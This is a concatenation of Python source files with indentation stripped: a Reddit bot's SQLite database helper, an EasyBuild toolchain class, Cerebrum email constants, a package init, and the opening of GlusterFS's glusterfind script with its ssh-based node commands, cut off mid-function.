self._error_if_not_exists(module)
self.cur.execute("""DELETE FROM update_threads
WHERE thing_id=(?)
AND bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?))
AND CURRENT_TIMESTAMP > lifetime""", (thing_id, module))
def register_module(self, module):
"""
Registers a module if it hasn't been so far. A module has to be registered to be usable with the rest of the
database.
:param module: A string naming your plugin.
:type module: str
"""
if self._check_if_module_exists(module):
return
self.cur.execute('INSERT INTO modules VALUES ((?))', (module,))
self.logger.debug("Module {} has been registered.".format(module))
def get_all_userbans(self):
"""
Returns all bans stored in the userban table.
:return: Tuple of tuples ``(username, bot_module)``
"""
self.cur.execute('SELECT * FROM userbans')
return self.cur.fetchall()
def get_all_bans_per_user(self, username):
"""
Returns all bans of a particular user across all plugins.
:param username: Author in fulltext in question
:type username: str
:return: Tuple of tuples ``(username, bot_module)``
"""
self.cur.execute('SELECT * FROM userbans WHERE username = (?)', (username,))  # no LIMIT: fetch all bans for this user
return self.cur.fetchall()
def check_user_ban(self, username, module):
"""
Checks if a particular user has been banned, first searches per module, then if there is a global ban.
:param username: Author in fulltext in question
:type username: str
:param module: A string naming your plugin.
:type module: str
:return: Boolean if banned or not.
"""
self.cur.execute('SELECT * FROM userbans '
'WHERE username = (?) AND '
'bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?)) '
'LIMIT 1', (username, module))
if self.cur.fetchone():
return True
# Global bans are stored with bot_module NULL; comparing with '=' against a
# NULL subquery never matches in SQL, so test IS NULL directly.
self.cur.execute('SELECT * FROM userbans '
'WHERE username = (?) AND '
'bot_module IS NULL '
'LIMIT 1', (username,))
return self.cur.fetchone() is not None
def add_userban_per_module(self, username, module):
"""
Bans a user for a certain module.
:param username: Author in fulltext in question
:type username: str
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute("INSERT INTO userbans (username, bot_module) "
"VALUES ((?), (SELECT _ROWID_ FROM modules WHERE module_name = (?)))", (username, module))
self.logger.debug('User {} got banned on {}'.format(username, module))
def add_userban_globally(self, username):
"""
Bans a user for all modules.
:param username: Author in fulltext in question
:type username: str
"""
self.cur.execute("INSERT INTO userbans (username, bot_module) "
"VALUES ((?), NULL)", (username,))
self.logger.debug('User {} got banned across all modules.'.format(username))
def remove_userban_per_module(self, username, module):
"""
Removes a ban from a certain modules.
:param username: Author in fulltext in question
:type username: str
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute("DELETE FROM userbans WHERE username = (?) AND "
"bot_module = (SELECT _ROWID_ FROM modules WHERE modules = (?))", (username, module))
self.logger.debug('User {} got unbanned on {}'.format(username, module))
def remove_userban_globally(self, username):
"""
Removes **all** bans for a user. Globally and per module level.
:param username: Author in fulltext in question
:type username: str
"""
self.cur.execute("DELETE FROM userbans WHERE username = (?)", (username,))
self.logger.debug('User {} got unbanned across all modules.'.format(username))
def purge_all_user_bans(self):
"""
Removes **all** bans for **all** users - no exception, clears the entire table.
"""
self.cur.execute("DELETE FROM userbans")
self.logger.debug('Removed all userbans!')
def get_all_banned_subreddits(self):
"""
Returns all bans stored in the subreddit ban table
"""
self.cur.execute('SELECT * FROM subbans')
return self.cur.fetchall()
def get_all_bans_per_subreddit(self, subreddit):
"""
Returns **all** bans for a particular subreddit
:param subreddit: Subreddit name in question
:type subreddit: str
"""
self.cur.execute('SELECT * FROM subbans WHERE subreddit = (?)', (subreddit,))  # no LIMIT: fetch all bans for this subreddit
return self.cur.fetchall()
def check_subreddit_ban(self, subreddit, module):
"""
Returns if a certain subreddit is banned from a module or across all modules.
:param subreddit: Subreddit name in question
:type subreddit: str
:param module: A string naming your plugin.
:type module: str
:return: Boolean, True if banned, False if not.
"""
self.cur.execute('SELECT * FROM subbans '
'WHERE subreddit = (?) AND '
'bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?)) '
'LIMIT 1', (subreddit, module))
if self.cur.fetchone():
return True
# Global bans are stored with bot_module NULL; comparing with '=' against a
# NULL subquery never matches in SQL, so test IS NULL directly.
self.cur.execute('SELECT * FROM subbans '
'WHERE subreddit = (?) AND '
'bot_module IS NULL '
'LIMIT 1', (subreddit,))
return self.cur.fetchone() is not None
def add_subreddit_ban_per_module(self, subreddit, module):
"""
Bans a subreddit from a certain module.
:param subreddit: Subreddit name in question
:type subreddit: str
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute("INSERT INTO subbans (subreddit, bot_module) "
"VALUES ((?), (SELECT _ROWID_ FROM modules WHERE module_name = (?)))", (subreddit, module))
self.logger.debug('Subreddit {} got banned on {}'.format(subreddit, module))
def add_subreddit_ban_globally(self, subreddit):
"""
Bans a subreddit across all modules.
:param subreddit: Subreddit name in question
:type subreddit: str
"""
self.cur.execute("INSERT INTO subbans (subreddit, bot_module) "
"VALUES ((?), NULL)", (subreddit,))
self.logger.debug('Subreddit {} got banned across all modules.'.format(subreddit))
def remove_subreddit_ban_per_module(self, subreddit, module):
"""
Removes a subreddit ban for a certain module
:param subreddit: Subreddit name in question
:type subreddit: str
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute("DELETE FROM subbans WHERE subreddit = (?) AND "
"bot_module = (SELECT _ROWID_ FROM modules WHERE modules = (?))", (subreddit, module))
self.logger.debug('Subreddit {} got unbanned on {}'.format(subreddit, module))
def remove_subreddit_ban_globally(self, subreddit):
"""
Removes a subreddit ban across all modules and globally
:param subreddit: Subreddit name in question
:type subreddit: str
"""
self.cur.execute("DELETE FROM subbans WHERE subreddit = (?)", (subreddit,))
self.logger.debug('Subreddit {} got unbanned across all modules.'.format(subreddit))
def purge_all_subreddit_bans(self):
"""
Removes all subreddit bans from the table - no exceptions, clears the table.
"""
self.cur.execute("DELETE FROM subbans")
self.logger.debug('All subreddit bans removed!')
def _check_if_module_exists(self, module):
"""
Helper method to determine if a module has already been registered. Refrain from using it; that is why it is private.
:param module: A string naming your plugin.
:type module: str
:return: Boolean determining if a module already has been registered.
:raise ValueError: In case of a module being registered multiple times - which should never happen - the
``Database`` object will raise a value error.
"""
self.cur.execute('SELECT COUNT(*) FROM modules WHERE module_name = (?)', (module,))
result = self.cur.fetchone()
if result[0] == 0:
return False
if result[0] == 1:
return True
if result[0] > 1:
raise ValueError("A module was registered multiple times and is therefore inconsistent. Call for help.")
def _error_if_not_exists(self, module):
"""
Helper method for throwing a concrete error if a module has not been registered, yet tries to write into the
database without having a reference.
:param module: A string naming your plugin.
:type module: str
:raise LookupError: If the module doesn't exist, it raises an error.
"""
if not self._check_if_module_exists(module):
raise LookupError('The module where this operation comes from is not registered!')
def get_all_modules(self):
"""
Returns all modules that have been registered so far.
:return: Tuple of tuples ``(_ROWID_, module_name)``
"""
self.cur.execute('SELECT _ROWID_, module_name FROM modules')
return self.cur.fetchall()
def clean_up_database(self, older_than_unixtime):
"""
Cleans up the database: everything older than the session time is deleted, along with all update-threads
that have outlived their lifetime.
:param older_than_unixtime: Unix timestamp from which point entries have to be older than to be deleted.
:type older_than_unixtime: int | float
"""
self.cur.execute("""DELETE FROM storage WHERE timestamp < datetime((?), 'unixepoch')""", (older_than_unixtime,))
self.cur.execute("""DELETE FROM update_threads WHERE CURRENT_TIMESTAMP > lifetime""")
self.logger.debug('Database cleanup: All storage items older than '
'{} and all deprecated update-threads removed'.format(older_than_unixtime))
def wipe_module(self, module):
"""
Wipes a module across all tables and all its references.
:param module: A string naming your plugin.
:type module: str
"""
self.cur.execute("""DELETE FROM storage
WHERE bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?))""", (module,))
self.cur.execute("""DELETE FROM update_threads
WHERE bot_module = (SELECT _ROWID_ FROM modules WHERE module_name = (?))""", (module,))
self.cur.execute("""DELETE FROM modules WHERE module_name = (?)""", (module,))
self.logger.debug("{} got wiped from all tables and all its references.".format(module))
def add_to_stats(self, id, bot_name, title, username, subreddit, permalink):
"""
Adds a row to the stats, see params (is handled by RedditRover).
:param id: submission or comment id
:type id: str
:param bot_name: Plugin Name
:type bot_name: str
:param title: Title of original submission
:type title: str
:param username: Original Author of responded submission
:type username: str
:param subreddit: Subreddit Name of submission
:type subreddit: str
:param permalink: Permalink to comment or submission the bot has responded upon
:type permalink: str
"""
self.cur.execute('''INSERT INTO stats (id, bot_module, created, title, username, subreddit, permalink)
VALUES ((?),
(SELECT _ROWID_ FROM modules WHERE module_name = (?)),
DATETIME('now'),
(?),
(?),
(?),
(?))''', (id, bot_name, title, username, subreddit, permalink))
def get_all_stats(self):
"""
Returns a tuple of tuple, be warned: ``upvotes_author`` and ``upvotes_bot`` can both be null.
:return: Tuple of tuples: ``(id, module_name, created, title, username, subreddit,
permalink, upvotes_author, upvotes_bot)``
"""
self.cur.execute("""SELECT id, module_name, created, title, username, subreddit,
permalink, upvotes_author, upvotes_bot
FROM stats
INNER JOIN modules
ON bot_module = modules._ROWID_""")
return self.cur.fetchall()
def get_total_responses_per_day(self, timestamp):
"""
Gets the total amount of rows for a day. The timestamp has to be in that day to work.
:param timestamp: Unix timestamp of day
:type timestamp: int | float
:return: Tuple with ``(amount of rows,)``
"""
self.cur.execute('''SELECT count(*) FROM stats
WHERE created BETWEEN DATE((?), 'unixepoch') AND DATE((?), 'unixepoch', '+1 day')''',
(timestamp, timestamp))
return self.cur.fetchone()
def get_karma_loads(self):
"""
Returns a tuple with IDs for karma statistics.
:return: Tuple with ``(id,)``
"""
self.cur.execute('''SELECT id FROM stats
WHERE upvotes_author is NULL
AND created < DATETIME('now', '-7 days')''')
return self.cur.fetchall()
def update_karma_count(self, thing_id, author_upvotes, plugin_upvotes):
"""
Updates the karma count for a previously stored response.
:param thing_id: id of submission a plugin has responded on
:type thing_id: str
:param author_upvotes: Amount of upvotes from the author
:type author_upvotes: int
:param plugin_upvotes: Amount of upvotes from the plugin
:type plugin_upvotes: int
"""
self.cur.execute('''UPDATE stats
SET upvotes_author = (?), upvotes_bot = (?)
WHERE id = (?)''', (author_upvotes, plugin_upvotes, thing_id))
def update_karma_count_with_null(self, thing_id, author_upvotes):
"""
Updates only author_upvotes, sometimes plugin responses are already deleted.
:param thing_id: id of submission a plugin has responded on
:type thing_id: str
:param author_upvotes: Amount of upvotes from the author
:type author_upvotes: int
"""
self.cur.execute('''UPDATE stats SET upvotes_author = (?) WHERE id = (?)''', (author_upvotes, thing_id))
def add_message(self, msg_id, bot_module, created, username, title, body):
"""
Upon receiving a message, its contents will be stored in a table for statistical purposes and overview of all
plugins inboxes.
:param msg_id: Unique message id from reddit.
:type msg_id: str
:param bot_module: Plugins Name
:type bot_module: str
:param created: Unix timestamp of the message's arrival
:type created: int | float
:param username: Original author of the message
:type username: str
:param title: Subject of said message
:type title: str
:param body: Text body of this message.
:type body: str
"""
self.cur.execute('''INSERT INTO messages (id, bot_module, created, title, author, body)
VALUES ( (?),
(SELECT _ROWID_ FROM modules WHERE module_name = (?)),
DATETIME((?), 'unixepoch'),
(?),
(?),
(?)) ''', (msg_id, bot_module, created, title, username, body))  # order matches the (title, author) columns above
def get_all_messages(self):
"""
Returns all messages in the messages table.
:return: Tuple of tuples: ``(id, module_name, created, title, author, body)``
"""
self.cur.execute('''SELECT id, module_name, created, title, author, body FROM messages
INNER JOIN modules
ON bot_module = modules._ROWID_
''')
return self.cur.fetchall()
def select_day_from_meta(self, timestamp):
"""
Returns a certain day from the meta_stats.
:param timestamp: Unix timestamp from a certain day. Has to be within that day.
:type timestamp: int | float
:return: Tuple of ``(day, seen_submissions, seen_comment, update_cycles)``
"""
self.cur.execute('''SELECT * FROM meta_stats WHERE day = DATE((?), 'unixepoch')''', (timestamp,))
return self.cur.fetchone()
def add_submission_to_meta(self, count, force=False):
"""
Increases the submission count for this day in a cached fashion.
:param count: Increases current count by this count.
:type count: int
:param force: Forces the write out into the database.
:type force: bool
"""
self.write_out_meta_push(force)
self._meta_push['submissions'] += count
def add_comment_to_meta(self, count, force=False):
"""
Increases the comment count for this day in a cached fashion.
:param count: Increases current count by this count.
:type count: int
:param force: Forces the write out into the database.
:type force: bool
"""
self.write_out_meta_push(force)
self._meta_push['comments'] += count
def add_update_cycle_to_meta(self, count, force=False):
"""
Increases the update cycle count for this day in a cached fashion
:param count: Increases current count by this count.
:type count: int
:param force: Forces the write out into the database.
:type force: bool
"""
self.write_out_meta_push(force)
self._meta_push['cycles'] += count
def _write_out_meta_push(self):
"""
Writes out the values in the meta cache. Reduces the amount of DB requests by a major amount.
"""
for k, count in self._meta_push.items():
if k == 'submissions':
self._add_submission_to_meta(count, self._date * 3600)
if k == 'comments':
self._add_comment_to_meta(count, self._date * 3600)
if k == 'cycles':
self._add_update_cycle_to_meta(count, self._date * 3600)
self._meta_push = {'submissions': 0, 'comments': 0, 'cycles': 0}
def write_out_meta_push(self, force=False):
"""
Checks if the meta cache has to be written - or can be forced.
:param force: Forces the write out
:type force: bool
"""
if force or sum(self._meta_push.values()) >= self._MAX_CACHE:
self._write_out_meta_push()
if self._date != time.time() // 3600:
self._write_out_meta_push()
self._date = time.time() // 3600
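# Flush behavior above: counts accumulate in _meta_push and are written out
# once their sum reaches _MAX_CACHE, when the hour in _date rolls over, or
# when force=True (as registered via atexit in __init__).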
def _add_submission_to_meta(self, count, timestamp):
"""
Increases the submission count for a day.
:param count: Amount of which it should be increased.
:type count: int
:param timestamp: Timestamp that lies in that day it should be increased to.
:type timestamp: int | float
"""
if not self.select_day_from_meta(timestamp):
self.cur.execute('''INSERT INTO meta_stats (day, seen_submissions)
VALUES (DATE((?), 'unixepoch'), (?))''', (timestamp, count))
else:
self.cur.execute('''UPDATE meta_stats SET seen_submissions = seen_submissions + (?)
WHERE day = DATE((?), 'unixepoch')''', (count, timestamp))
def _add_comment_to_meta(self, count, timestamp):
"""
Increases the comment count for a day.
:param count: Amount of which it should be increased.
:type count: int
:param timestamp: Timestamp that lies in that day it should be increased to.
:type timestamp: int | float
"""
if not self.select_day_from_meta(timestamp):
self.cur.execute('''INSERT INTO meta_stats (day, seen_comments)
VALUES (DATE((?), 'unixepoch'), (?))''', (timestamp, count))
else:
self.cur.execute('''UPDATE meta_stats SET seen_comments = seen_comments + (?)
WHERE day = DATE((?), 'unixepoch')''', (count, timestamp))
def _add_update_cycle_to_meta(self, count, timestamp):
"""
Increases the update cycle count for a day.
:param count: Amount of which it should be increased.
:type count: int
:param timestamp: Timestamp that lies in that day it should be increased to.
:type timestamp: int | float
"""
if not self.select_day_from_meta(timestamp):
self.cur.execute('''INSERT INTO meta_stats (day, update_cycles)
VALUES (DATE((?), 'unixepoch'), (?))''', (timestamp, count))
else:
self.cur.execute('''UPDATE meta_stats SET update_cycles = update_cycles + (?)
WHERE day = DATE((?), 'unixepoch')''', (count, timestamp))
if __name__ == "__main__":
db = Database()
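# Hypothetical session sketch: a module must be registered before any table
# referencing modules._ROWID_ can be written to.
#   db.register_module('my_plugin')
#   db.insert_into_storage('t3_abc123', 'my_plugin')
#   db.retrieve_thing('t3_abc123', 'my_plugin')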
|
"""
EasyBuild support for gompic compiler toolchain (includes GCC and OpenMPI and CUDA).
:author: Kenneth Hoste (Ghent University)
:author: Fotis Georgatos (Uni.Lu, NTUA)
"""
from easybuild.toolchains.gcccuda import GccCUDA
from easybuild.toolchains.mpi.openmpi import OpenMPI
class Gompic(GccCUDA, OpenMPI):
"""Compiler toolchain with GCC+CUDA and OpenMPI."""
NAME = 'gompic'
SUBTOOLCHAIN = GccCUDA.NAME
|
""" Constant types and common constants for the Email module. """
from Cerebrum import Constants
class _EmailTargetCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_target_code]'
class _EmailDomainCategoryCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_domain_cat_code]'
class _EmailServerTypeCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_server_type_code]'
class _EmailTargetFilterCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_target_filter_code]'
class _EmailSpamLevelCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_spam_level_code]'
def __init__(self, code, level=None, description=None):
super(_EmailSpamLevelCode, self).__init__(code, description)
self.level = level
def insert(self):
self._pre_insert_check()
self.sql.execute("""
INSERT INTO %(code_table)s
(%(code_col)s, %(str_col)s, level, %(desc_col)s)
VALUES
(%(code_seq)s, :str, :level, :desc)""" % {
'code_table': self._lookup_table,
'code_col': self._lookup_code_column,
'str_col': self._lookup_str_column,
'desc_col': self._lookup_desc_column,
'code_seq': self._code_sequence},
{'str': self.str,
'level': self.level,
'desc': self._desc})
def get_level(self):
if self.level is None:
self.level = int(self.sql.query_1("""
SELECT level
FROM %(code_table)s
WHERE code=:code""" % {'code_table': self._lookup_table},
{'code': int(self)}))
return self.level
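# Usage sketch (hypothetical code string and level): spam level codes carry an
# extra numeric column, written by insert() and lazily fetched by get_level().
#   standard = _EmailSpamLevelCode('standard', level=5,
#                                  description='Standard spam filtering')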
class _EmailSpamActionCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_spam_action_code]'
class _EmailVirusFoundCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_virus_found_code]'
class _EmailVirusRemovedCode(Constants._CerebrumCode):
_lookup_table = '[:table schema=cerebrum name=email_virus_removed_code]'
class EmailConstants(Constants.Constants):
# TODO: Clean up these constants! And do it in a way that lets
# us import system specific constants
EmailTarget = _EmailTargetCode
EmailDomainCategory = _EmailDomainCategoryCode
EmailServerType = _EmailServerTypeCode
EmailSpamLevel = _EmailSpamLevelCode
EmailSpamAction = _EmailSpamActionCode
EmailTargetFilter = _EmailTargetFilterCode
EmailVirusFound = _EmailVirusFoundCode
EmailVirusRemoved = _EmailVirusRemovedCode
entity_email_domain = Constants._EntityTypeCode(
'email_domain',
'Email domain - see table "cerebrum.email_domain" and friends.')
entity_email_address = Constants._EntityTypeCode(
'email_address',
'Email address - see table "cerebrum.email_address" and friends.')
entity_email_target = Constants._EntityTypeCode(
'email_target',
'Email target - see table "cerebrum.email_target" and friends.')
email_domain_category_noexport = _EmailDomainCategoryCode(
'noexport',
'Addresses in these domains can be defined, but are not'
' exported to the mail system. This is useful for'
' pre-defining addresses prior to taking over a new'
' maildomain.')
email_domain_category_cnaddr = _EmailDomainCategoryCode(
'cnaddr',
"Primary user addresses in these domains will be based on the"
" owner's full common name, and not just e.g. the username.")
email_domain_category_uidaddr = _EmailDomainCategoryCode(
'uidaddr',
'Primary user addresses in these domains will be in the format '
'username@domain.')
email_domain_category_include_all_uids = _EmailDomainCategoryCode(
'all_uids',
'All account email targets should get a valid address in this domain,'
' on the form <accountname@domain>.')
email_target_account = _EmailTargetCode(
'account',
"Target is the local delivery defined for the PosixUser whose"
" account_id == email_target.using_uid.")
# exchange-related-jazz
email_target_dl_group = _EmailTargetCode(
'group',
"Target is the Exchange - local delivery defined for"
" the DistributionGroup with"
" group_id == email_target.using_uid.")
email_target_deleted = _EmailTargetCode(
'deleted',
"Target type for addresses that are no longer working, but"
" for which it is useful to include a short custom text in"
" the error message returned to the sender. The text"
" is taken from email_target.alias_value")
email_target_forward = _EmailTargetCode(
'forward',
"Target is a pure forwarding mechanism; local deliveries will"
" only occur as indirect deliveries to the addresses forwarded"
" to. Both email_target.target_entity_id, email_target.using_uid and"
" email_target.alias_value should be NULL, as they are ignored."
" The email address(es) to forward to is taken from table"
" email_forward.")
email_target_file = _EmailTargetCode(
'file',
"Target is a file. The absolute path of the file is gathered"
" from email_target.alias_value. Iff email_target.using_uid"
" is set, deliveries to this target will be run as that"
" PosixUser.")
email_target_pipe = _EmailTargetCode(
'pipe',
"Target is a shell pipe. The command (and args) to pipe mail"
" into is gathered from email_target.alias_value. Iff"
" email_target.using_uid is set, deliveries to this target"
" will be run as that PosixUser.")
email_target_RT = _EmailTargetCode(
'RT',
"Target is a RT queue. The command (and args) to pipe mail"
" into is gathered from email_target.alias_value. Iff"
" email_target.using_uid is set, deliveries to this target"
" will be run as that PosixUser.")
email_target_Sympa = _EmailTargetCode(
'Sympa',
"Target is a Sympa mailing list. The command (and args) to"
" pipe mail into is gathered from email_target.alias_value."
" Iff email_target.using_uid is set, deliveries to this target"
" will be run as that PosixUser.")
email_target_multi = _EmailTargetCode(
'multi',
"Target is the set of `account`-type targets corresponding to"
" the Accounts that are first-level members of the Group that"
" has group_id == email_target.target_entity_id.")
email_server_type_nfsmbox = _EmailServerTypeCode(
'nfsmbox',
"Server delivers mail as mbox-style mailboxes over NFS.")
email_server_type_cyrus = _EmailServerTypeCode(
'cyrus_IMAP',
"Server is a Cyrus IMAP server, which keeps mailboxes in a "
"Cyrus-specific format.")
email_server_type_sympa = _EmailServerTypeCode(
'sympa',
"Server is a Sympa mailing list server.")
email_server_type_exchange = _EmailServerTypeCode(
'exchange',
"Exchange server.")
email_target_filter_greylist = _EmailTargetFilterCode(
'greylist',
"Delay messages from unknown servers")
email_target_filter_uioonly = _EmailTargetFilterCode(
'uioonly',
"Only accept the use of an UiO address as sender address"
" on the UiO network, or when using authenticated SMTP")
email_target_filter_internalonly = _EmailTargetFilterCode(
'internalonly',
"Only route internal mail. External mail is rejected")
class CLConstants(Constants.CLConstants):
# ChangeTypes used by the email module
    # TODO: Put these in their own file? Put that file and this file into
    # Cerebrum/modules/email/?
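    # Note: the trailing argument(s) to each _ChangeTypeCode describe how
    # change parameters are rendered, using %(type:param) tokens,
    # e.g. 'name=%(string:new_domain_name)'.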
# email domain
email_dom_add = Constants._ChangeTypeCode(
'email_domain', 'add', 'add email domain %(subject)s',
'name=%(string:new_domain_name)')
email_dom_rem = Constants._ChangeTypeCode(
'email_domain', 'remove', 'remove email domain %(subject)s',
        'name=%(string:del_domain)')
# either domain name or domain description has been changed
email_dom_mod = Constants._ChangeTypeCode(
'email_domain', 'modify', 'modify email domain %(subject)s',
('name=%(string:new_domain_name)',
         'desc=%(string:new_domain_desc)'))
email_dom_addcat = Constants._ChangeTypeCode(
'email_domain_category', 'add', 'add category in email domain'
' %(subject)s',
'cat=%(int:cat)')
email_dom_remcat = Constants._ChangeTypeCode(
'email_domain_category', 'remove', 'remove category in email domain'
' %(subject)s',
'cat=%(int:cat)')
# email target
email_target_add = Constants._ChangeTypeCode(
        'email_target', 'add', 'add email target %(subject)s')
email_target_rem = Constants._ChangeTypeCode(
'email_target', 'remove', 'remove email target %(subject)s')
email_target_mod = Constants._ChangeTypeCode(
'email_target', 'modify', 'modify email target %(subject)s',
('type=id:%(int:target_type)s',
'server=id:%(int:server_id)s', ))
# email address
email_address_add = Constants._ChangeTypeCode(
'email_address', 'add', 'add email address %(subject)s',
('lp=%(string:lp)s',
'domain=%(int:dom_id)s'))
email_address_rem = Constants._ChangeTypeCode(
'email_address', 'remove', 'remove email address %(subject)s',
('lp=%(string:lp)s',
'domain=%(int:dom_id)s'))
email_address_mod = Constants._ChangeTypeCode(
'email_address', 'mod', 'modify email address %(subject)s',
('lp=%(string:lp)s',
'domain=%(int:dom_id)s'))
# email entity domain affiliation
email_entity_dom_add = Constants._ChangeTypeCode(
'email_entity_domain', 'add', 'add domain aff for %(subject)s',
'affiliation=%(int:aff)')
email_entity_dom_rem = Constants._ChangeTypeCode(
'email_entity_domain', 'remove', 'remove domain aff for %(subject)s')
email_entity_dom_mod = Constants._ChangeTypeCode(
'email_entity_domain', 'modify', 'modify domain aff for %(subject)s',
'affiliation=%(int:aff)')
# email quota (subject here is an email_target)
email_quota_add = Constants._ChangeTypeCode(
'email_quota', 'add', 'add quota for %(subject)s',
('soft=%(int:soft)',
'hard=%(int:hard)'))
email_quota_rem = Constants._ChangeTypeCode(
'email_quota', 'remove', 'remove quota for %(subject)s')
email_quota_mod = Constants._ChangeTypeCode(
'email_quota', 'modify', 'modify quota for %(subject)s',
('soft=%(int:soft)',
'hard=%(int:hard)'))
# email target filter
email_tfilter_add = Constants._ChangeTypeCode(
'email_tfilter', 'add', 'add tfilter for %(subject)s',
'filter=%(int:filter)')
email_tfilter_rem = Constants._ChangeTypeCode(
'email_tfilter', 'remove', 'remove tfilter for %(subject)s',
'filter=%(int:filter)')
# email spam_filter
email_sfilter_add = Constants._ChangeTypeCode(
'email_sfilter', 'add', 'add sfilter for %(subject)s',
('level=%(int:level)',
'action=%(int:action)'))
email_sfilter_mod = Constants._ChangeTypeCode(
'email_sfilter', 'modify', 'modify sfilter for %(subject)s',
('level=%(int:level)',
'action=%(int:action)'))
# email virus scan
email_scan_add = Constants._ChangeTypeCode(
'email_scan', 'add', 'add scan for %(subject)s',
('found=%(int:found)',
'removed=%(int:removed)',
'enable=%(int:enable)'))
email_scan_mod = Constants._ChangeTypeCode(
'email_scan', 'modify', 'modify scan for %(subject)s')
# email forward (subject here is an email_target)
email_forward_add = Constants._ChangeTypeCode(
'email_forward', 'add',
'add forward for %(subject)s',
('forward=%(string:forward)s',
'enable=%(bool:enable)s'))
email_forward_rem = Constants._ChangeTypeCode(
'email_forward', 'remove',
'remove forward for %(subject)s',
('forward=%(string:forward)s', ))
email_forward_enable = Constants._ChangeTypeCode(
'email_forward', 'enable',
'enable forward for %(subject)s',
('forward=%(string:forward)s',
'cat=%(int:cat)s'))
email_forward_disable = Constants._ChangeTypeCode(
'email_forward', 'disable',
'disable forward for %(subject)s',
('forward=%(string:forward)s',
'cat=%(int:cat)s'))
# Local delivery of email forwards
email_local_delivery = Constants._ChangeTypeCode(
'email_forward_local_delivery', 'set',
'modify local delivery for subject %(subject)s',
('enabled=%(string:enabled)s', ))
# email primary address target (subject here is an email_target)
email_primary_address_add = Constants._ChangeTypeCode(
'email_primary_address', 'add',
'add primary address for %(subject)s', 'primary=%(int:addr_id)')
email_primary_address_rem = Constants._ChangeTypeCode(
'email_primary_address', 'remove',
'remove primary address for %(subject)s', 'primary=%(int:addr_id)')
email_primary_address_mod = Constants._ChangeTypeCode(
'email_primary_address', 'modify',
'modify primary address for %(subject)s', 'primary=%(int:addr_id)')
# email server (subject here is an e-mail server)
email_server_add = Constants._ChangeTypeCode(
'email_server', 'add', 'add email server %(subject)s',
'type=%(int:server_type)')
email_server_rem = Constants._ChangeTypeCode(
'email_server', 'remove', 'remove email server %(subject)s',
'type=%(int:server_type)')
email_server_mod = Constants._ChangeTypeCode(
'email_server', 'modify', 'modify email server %(subject)s',
'type=%(int:server_type)')
|
"""{{ cookiecutter.site_name }}."""
from __future__ import absolute_import, print_function
from .version import __version__
__all__ = ('__version__',)
|
import sys
from errno import ENOENT, ENOTEMPTY
import time
from multiprocessing import Process
import os
import xml.etree.cElementTree as etree
from argparse import ArgumentParser, RawDescriptionHelpFormatter, Action
import logging
import shutil
from utils import execute, is_host_local, mkdirp, fail
from utils import setup_logger, human_time, handle_rm_error
from utils import get_changelog_rollover_time, cache_output, create_file
import conf
from changelogdata import OutputMerger
PROG_DESCRIPTION = """
GlusterFS Incremental API
"""
ParseError = etree.ParseError if hasattr(etree, 'ParseError') else SyntaxError
logger = logging.getLogger()
node_outfiles = []
vol_statusStr = ""
class StoreAbsPath(Action):
def __init__(self, option_strings, dest, nargs=None, **kwargs):
super(StoreAbsPath, self).__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, os.path.abspath(values))
def get_pem_key_path(session, volume):
return os.path.join(conf.get_opt("session_dir"),
session,
volume,
"%s_%s_secret.pem" % (session, volume))
def node_cmd(host, host_uuid, task, cmd, args, opts):
"""
Runs command via ssh if host is not local
"""
localdir = is_host_local(host_uuid)
    # Skip deletion on the local node to avoid removing the ssh keys, which
    # would otherwise cause ssh password prompts on the console (race
    # conditions); mode_delete() cleans up the session tree instead.
if localdir and task == "delete":
return
pem_key_path = get_pem_key_path(args.session, args.volume)
if not localdir:
# prefix with ssh command if not local node
cmd = ["ssh",
"-i", pem_key_path,
"root@%s" % host] + cmd
execute(cmd, exit_msg="%s - %s failed" % (host, task), logger=logger)
if opts.get("copy_outfile", False):
cmd_copy = ["scp",
"-i", pem_key_path,
"root@%s:/%s" % (host, opts.get("node_outfile")),
os.path.dirname(opts.get("node_outfile"))]
execute(cmd_copy, exit_msg="%s - Copy command failed" % host,
logger=logger)
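# run_cmd_nodes below builds a per-brick command for the given task ("pre",
# "cleanup", "create", "post" or "delete") and runs one Process per brick
# node in parallel, each dispatching through node_cmd above.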
def run_cmd_nodes(task, args, **kwargs):
global node_outfiles
nodes = get_nodes(args.volume)
pool = []
for num, node in enumerate(nodes):
host, brick = node[1].split(":")
host_uuid = node[0]
cmd = []
opts = {}
node_outfile = os.path.join(conf.get_opt("working_dir"),
args.session, args.volume,
"tmp_output_%s" % num)
if task == "pre":
if vol_statusStr != "Started":
fail("Volume %s is not online" % args.volume,
logger=logger)
            # If a full backup is requested, use brickfind instead of the
            # changelog-based change detector
change_detector = conf.get_change_detector("changelog")
if args.full:
change_detector = conf.get_change_detector("brickfind")
node_outfiles.append(node_outfile)
cmd = [change_detector,
args.session,
args.volume,
brick,
node_outfile,
str(kwargs.get("start")),
"--output-prefix",
args.output_prefix] + \
(["--debug"] if args.debug else []) + \
(["--only-namespace-changes"] if args.only_namespace_changes
else [])
opts["node_outfile"] = node_outfile
opts["copy_outfile"] = True
elif task == "cleanup":
# After pre run, cleanup the working directory and other temp files
# Remove the copied node_outfile in main node
try:
os.remove(node_outfile)
except (OSError, IOError):
logger.warn("Failed to cleanup temporary file %s" %
node_outfile)
cmd = [conf.get_opt("nodeagent"),
"cleanup",
args.session,
args.volume] + (["--debug"] if args.debug else [])
elif task == "create":
if vol_statusStr != "Started":
fail("Volume %s is not online" % args.volume,
logger=logger)
# When glusterfind create, create session directory in
# each brick nodes
cmd = [conf.get_opt("nodeagent"),
"create",
args.session,
args.volume,
brick,
kwargs.get("time_to_update")] + \
(["--debug"] if args.debug else []) + \
(["--reset-session-time"] if args.reset_session_time
else [])
elif task == "post":
